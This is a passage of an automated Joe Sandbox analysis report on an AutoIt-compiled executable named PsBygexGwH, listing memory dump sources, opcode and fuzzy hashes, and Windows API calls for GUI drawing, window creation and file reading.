                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: a6ff5ba3592d3e7f5ce860258c9a36ebcebac4fd9076e4ac1dafbfa639b19007
                                                          • Instruction ID: 83cce5d77c1433a6702f48b1d031cb63cb822b203a2c4ab72f1c96b9eb4041be
                                                          • Opcode Fuzzy Hash: a6ff5ba3592d3e7f5ce860258c9a36ebcebac4fd9076e4ac1dafbfa639b19007
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                          • Instruction ID: d0aa600431a40360402e13087e443fc2722c40f1d2892211d9da8c8db4bbcb6e
                                                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                          • Instruction Fuzzy Hash: DB51897160C70B9BDF3C8578C85E7BE63899B22358F180919D886D72F2C715DE06D352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cce2854834173eb4d678fe795111fbea7082152880a6910a873b6c91c2ccf56
                                                          • Instruction ID: ab9656c980cb12d4d99b19aa1c0c8e5e43d693c2290af8cf09d701ea95d33f4f
                                                          • Opcode Fuzzy Hash: 1cce2854834173eb4d678fe795111fbea7082152880a6910a873b6c91c2ccf56
                                                          • Instruction Fuzzy Hash: 4732D222D29F418ED7239634D822335A649AFB73D6F15D737E82AB9DA5EB29C4C34100
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69b9a0cae9e09a2de7062e7e764208407016b5591757cb25a4b4b0a0dbdbfa30
                                                          • Instruction ID: 4dbf0172358f63f8dd138a5a7771bbaf1f055c43cd98d23800fedef7c4e88aba
                                                          • Opcode Fuzzy Hash: 69b9a0cae9e09a2de7062e7e764208407016b5591757cb25a4b4b0a0dbdbfa30
                                                          • Instruction Fuzzy Hash: 0432F032A041558BCF28CE69C4D46BD7BB1EB45310F29C56EE85EAB291E730DD82DBC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 845990f5b901132f3025e89567b8ef908300a7655d9597b5a7ee1dbe3c2a86a5
                                                          • Instruction ID: 32d775d99d1f3a8bb32498fce3b4b15a478e8a315ab00a2e671cb7dbef2903da
                                                          • Opcode Fuzzy Hash: 845990f5b901132f3025e89567b8ef908300a7655d9597b5a7ee1dbe3c2a86a5
                                                          • Instruction Fuzzy Hash: 9A22D370A0061ADFDF14CFA5D881AAEB3F2FF54300F144529E816A7291EB369D61CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cf3b8ce374fb8f5148e0543118958bbbdb5064d55cfd66d1ebed16acaca5d68
                                                          • Instruction ID: 02a60f9fdb2658b4ffc6efbb9ba1437258db268c26fded7b96f7fa0bf09a16ed
                                                          • Opcode Fuzzy Hash: 5cf3b8ce374fb8f5148e0543118958bbbdb5064d55cfd66d1ebed16acaca5d68
                                                          • Instruction Fuzzy Hash: 5D02A4B5E00219EFDF04DF64D881AAEB7F1FF54304F118169E8169B291EB31AA61CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                          • Instruction ID: 312787e1000f27293658ed345d4a740b1c97717c83f158e483311c894c708763
                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                          • Instruction Fuzzy Hash: C49177736080E35ADB2E467A857407EFFE15B523A131A079DD4F2CA1E1FF208994D620
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction ID: 46bbf12745adb90e07f851f838487eb3025361aa820a312ef5d1967160b1f8c8
                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction Fuzzy Hash: 489132722090E35ADB6D467A857403EFFF19B923A631A079ED4F2CB1E1FF248594D620
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1eb590d0f234c92f5196340be234bb407b127b054ac73eb4b4713c6c05604cf
                                                          • Instruction ID: 56283ea5f5ceeb7d19ec90b40f298e5967875f88a3a32f5582d13097bcc2c4ea
                                                          • Opcode Fuzzy Hash: a1eb590d0f234c92f5196340be234bb407b127b054ac73eb4b4713c6c05604cf
                                                          • Instruction Fuzzy Hash: AA617A7160874A9ADE38AA288D95BBE2394DF51704F280D1EF983DB2F1DB11DE42C356
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3e4a96ac8eef394d975935baea50553b5aaba4d14fa8a0e9ddf03a43c050552
                                                          • Instruction ID: 6a9471cd99a035921a55e97468ecd08d9ec3a8afd2ee417f52c0ff4762b8d416
                                                          • Opcode Fuzzy Hash: a3e4a96ac8eef394d975935baea50553b5aaba4d14fa8a0e9ddf03a43c050552
                                                          • Instruction Fuzzy Hash: 9161CD71E2C74967CE399AA88C91BBF2388DF52748F100A59E943EB2F1DB12DD428351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction ID: 8ff9064fce29b3725439a2bdd95fed567a98ee66780120b9c5a824b04da9fcf2
                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction Fuzzy Hash: 198173336080E359DB6D427AC53443EFFE15B923A631A079DD4F2CA1E1EF248594E620
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction ID: 4bbf544400284870ceb1cbdd56ac5de579fe91ad86a635a534e26e103f8be967
                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction Fuzzy Hash: 2341B571D1051CDBCF48CFADC991AEEBBF1AF88201F648299D516AB345D730AB41DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6af327a9fe5a7945e9df43d1e51e623e3dcc37223dfa121cf9125844fc5c15d8
                                                          • Instruction ID: a55996455f96ecab6f89a8ca4478cbcdf5a61b1e2e21111683939cedcccffb80
                                                          • Opcode Fuzzy Hash: 6af327a9fe5a7945e9df43d1e51e623e3dcc37223dfa121cf9125844fc5c15d8
                                                          • Instruction Fuzzy Hash: 1321BB326205158BDB28CF79C81367E73E5A754320F19862EE4A7C37D1DE35AD44C780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction ID: ae7aac6bcb1b4f597747ca9934b56de2030018843f0951f59b41232fd2b238e3
                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction Fuzzy Hash: C3019278A14109EFCB44DF98C5909AEF7F5FB48310F2085D9D819A7701E730AE51DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction ID: d75d09763ef0d0e60f078163463440599f68467aaaadce6f8a5bbd6af4db55a5
                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction Fuzzy Hash: 76019278A01209EFCB48DF98C5909AEF7F5FB48310F2085D9D819A7701E730AE51DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 001A2B30
                                                          • DeleteObject.GDI32(00000000), ref: 001A2B43
                                                          • DestroyWindow.USER32 ref: 001A2B52
                                                          • GetDesktopWindow.USER32 ref: 001A2B6D
                                                          • GetWindowRect.USER32(00000000), ref: 001A2B74
                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001A2CA3
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001A2CB1
                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2CF8
                                                          • GetClientRect.USER32(00000000,?), ref: 001A2D04
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001A2D40
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D62
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D75
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D80
                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D89
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D98
                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2DA1
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2DA8
                                                          • GlobalFree.KERNEL32(00000000), ref: 001A2DB3
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2DC5
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001BFC38,00000000), ref: 001A2DDB
                                                          • GlobalFree.KERNEL32(00000000), ref: 001A2DEB
                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001A2E11
                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001A2E30
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2E52
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A303F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: cd4114e9e80147eec0a610ec1f60b09a503ff65d24e0173696afaf8c092c1cb8
                                                          • Instruction ID: 05afcb2bc5cc7bf6e99c6f5b5279174b68c5000f525a0c3d0debc6b7dd5a30d4
                                                          • Opcode Fuzzy Hash: cd4114e9e80147eec0a610ec1f60b09a503ff65d24e0173696afaf8c092c1cb8
                                                          • Instruction Fuzzy Hash: B7025D75900215EFDB14DF68DC89EAE7BB9FB49720F008158F915AB2A1C770ED41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 001B712F
                                                          • GetSysColorBrush.USER32(0000000F), ref: 001B7160
                                                          • GetSysColor.USER32(0000000F), ref: 001B716C
                                                          • SetBkColor.GDI32(?,000000FF), ref: 001B7186
                                                          • SelectObject.GDI32(?,?), ref: 001B7195
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001B71C0
                                                          • GetSysColor.USER32(00000010), ref: 001B71C8
                                                          • CreateSolidBrush.GDI32(00000000), ref: 001B71CF
                                                          • FrameRect.USER32(?,?,00000000), ref: 001B71DE
                                                          • DeleteObject.GDI32(00000000), ref: 001B71E5
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 001B7230
                                                          • FillRect.USER32(?,?,?), ref: 001B7262
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B7284
                                                            • Part of subcall function 001B73E8: GetSysColor.USER32(00000012), ref: 001B7421
                                                            • Part of subcall function 001B73E8: SetTextColor.GDI32(?,?), ref: 001B7425
                                                            • Part of subcall function 001B73E8: GetSysColorBrush.USER32(0000000F), ref: 001B743B
                                                            • Part of subcall function 001B73E8: GetSysColor.USER32(0000000F), ref: 001B7446
                                                            • Part of subcall function 001B73E8: GetSysColor.USER32(00000011), ref: 001B7463
                                                            • Part of subcall function 001B73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001B7471
                                                            • Part of subcall function 001B73E8: SelectObject.GDI32(?,00000000), ref: 001B7482
                                                            • Part of subcall function 001B73E8: SetBkColor.GDI32(?,00000000), ref: 001B748B
                                                            • Part of subcall function 001B73E8: SelectObject.GDI32(?,?), ref: 001B7498
                                                            • Part of subcall function 001B73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001B74B7
                                                            • Part of subcall function 001B73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001B74CE
                                                            • Part of subcall function 001B73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001B74DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: a84e31ce9a99899810280e4227b408ca08dc88b785f78681a9a8ae6b5228ce9b
                                                          • Instruction ID: 5a4235c85e35af18e26a2a71318a5c2967c56ecd9a0d4767248d2157c4ba3158
                                                          • Opcode Fuzzy Hash: a84e31ce9a99899810280e4227b408ca08dc88b785f78681a9a8ae6b5228ce9b
                                                          • Instruction Fuzzy Hash: 73A17172108301FFD7119F64DC48E9B7BA9FB89321F100B19F9A2A65E1D771E984CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(?,?), ref: 00138E14
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00176AC5
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00176AFE
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00176F43
                                                            • Part of subcall function 00138F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00138BE8,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 00138FC5
                                                          • SendMessageW.USER32(?,00001053), ref: 00176F7F
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00176F96
                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00176FAC
                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00176FB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
